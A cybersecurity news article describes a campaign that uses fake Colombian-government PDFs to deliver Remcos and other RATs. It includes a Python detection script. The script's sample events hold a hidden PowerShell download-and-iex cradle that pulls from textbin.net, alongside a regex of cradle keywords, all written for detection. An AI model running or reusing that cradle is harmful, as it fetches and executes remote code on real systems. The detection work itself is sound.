Hackers Employ Weaponized PDFs to Distribute Remcos RAT


Sophisticated Cyberattack Targets Latin American Individuals and Organizations with Weaponized PDFs

A cybercriminal campaign is targeting individuals and organizations across Latin America, using weaponized PDF files to deliver Remote Access Trojans (RATs) such as Remcos.

This alarming development has prompted concerns about the region's cybersecurity readiness.


Attack Method

The attackers initiate the infection by masquerading as Colombian government agencies and sending out PDF documents that falsely accuse recipients of traffic violations or other legal issues.

The documents contain links that, when clicked, download a ZIP archive.

The archive contains a Visual Basic Script (VBS) padded with dead code to hinder static detection.

The campaign cleverly impersonates official communication from entities like COLOMBIANA DE MUNICIPIOS, leveraging trust in government institutions to deceive victims.

The choice of lures suggests a targeted approach to individuals and potentially organizations associated with the Colombian government infrastructure.

When the VBS runs, it launches a PowerShell script that performs two actions:

  1. Retrieves the payload's address from a legitimate storage service such as textbin.net, then downloads the payload from that address.
  2. Executes the payload, which is hosted on legitimate services such as cdn.discordapp.com, pasteio.com, hidrive.ionos.com and wtools.io.
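The chain above (script host launches PowerShell, PowerShell fetches an address from a paste site, then downloads and runs the payload) is what a detection engineer would hunt for in process-creation telemetry. The script below is an added example, not code from the article or from ANY.RUN: it scores PowerShell launches on three signals (parent is wscript/cscript, a download cradle in the command line, a reference to one of the hosting services the article names) and reports only when two or more coincide, so a lone admin `iwr` is not flagged. The events are constructed Sysmon-style records, and the cradle keywords and file names (`comparendo.vbs`, the paste URL paths) are assumptions, since the page does not quote the script.

```python
"""Flag the WScript -> PowerShell -> paste-site download chain.

Added example; the events below are constructed Sysmon-style (Event ID 1)
process-creation records, not telemetry from the campaign.
"""
import re
from dataclasses import dataclass, field

# Hosts the article names as the "legitimate storage services" abused for
# the payload address (textbin.net) and for the payload itself.
STAGING_HOSTS = {
    "textbin.net",
    "cdn.discordapp.com",
    "pasteio.com",
    "hidrive.ionos.com",
    "wtools.io",
}

# Windows Script Host binaries that would run the .vbs dropped from the ZIP.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Common PowerShell download/execute cradle fragments (assumption: the
# campaign's script uses one of these; the page does not quote it).
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|invoke-expression|\biex\b|-enc(odedcommand)?\b",
    re.IGNORECASE,
)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


@dataclass
class Finding:
    pid: int
    score: int
    reasons: list = field(default_factory=list)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hosts_in(cmdline: str) -> set:
    """Return the staging hosts referenced anywhere in a command line."""
    found = set()
    for h in URL_HOST_RE.findall(cmdline):
        h = h.lower()
        if any(h == s or h.endswith("." + s) for s in STAGING_HOSTS):
            found.add(h)
    return found


def analyse(events):
    """Score each PowerShell launch: +1 parent is a script host, +1 a
    download cradle is present, +1 a known staging host is referenced.
    Score >= 2 is reported; a single signal on its own is not."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if _basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
            continue
        f = Finding(pid=ev.pid, score=0)
        parent = by_pid.get(ev.ppid)
        if parent and _basename(parent.image) in SCRIPT_HOSTS:
            f.score += 1
            f.reasons.append(f"spawned by {_basename(parent.image)} ({parent.cmdline!r})")
        if CRADLE_RE.search(ev.cmdline):
            f.score += 1
            f.reasons.append("download/execute cradle in command line")
        hosts = hosts_in(ev.cmdline)
        if hosts:
            f.score += 1
            f.reasons.append("staging host(s): " + ", ".join(sorted(hosts)))
        if f.score >= 2:
            findings.append(f)
    return findings


# Constructed sample events (not real telemetry): pid 300 is the lure's VBS,
# pid 301 the stager it launches, pids 400 and 500 are benign controls.
SAMPLE_EVENTS = [
    ProcEvent(200, 100, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(300, 200, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\ana\Downloads\comparendo.vbs"'),
    ProcEvent(301, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"$u=(New-Object Net.WebClient)"
              ".DownloadString('https://textbin.net/raw/example');"
              "iex ((New-Object Net.WebClient).DownloadString($u))\""),
    # benign control: logon script started by a script host, no cradle
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -File C:\\logon\\map-drives.ps1"),
    # benign control: admin downloading by hand, parent is explorer
    ProcEvent(500, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe iwr https://example.com/tool.zip -OutFile tool.zip"),
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"pid {f.pid} score {f.score}: " + "; ".join(f.reasons))
```

Only pid 301 is reported (score 3); the two controls each trip a single signal and stay silent. In production the same scoring maps directly onto a Sysmon or EDR query keyed on ParentImage, CommandLine and the destination hosts, and the host list should be treated as a starting point rather than an exhaustive indicator set.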

A recent tweet by ANY.RUN sheds light on the ongoing cyberattack campaign in Latin America, where users are coerced into initiating malware infections.


RATs Used

The final payload of this execution chain is a RAT; the attackers have been observed delivering several well-known families, including AsyncRAT, NjRAT and Remcos.

These RATs grant cybercriminals remote control over infected systems, enabling them to steal sensitive information, monitor user actions, and potentially deploy further malware.

Cybersecurity experts warn that while this campaign focuses on Latin America, similar tactics could be employed against targets in other regions.

Organizations and individuals are advised to remain vigilant, train users to recognise this kind of legal-threat lure, and implement controls that break the chain described above: restricting or logging Windows Script Host execution, monitoring PowerShell launched from script hosts, and scrutinising outbound traffic to paste and file-sharing services.
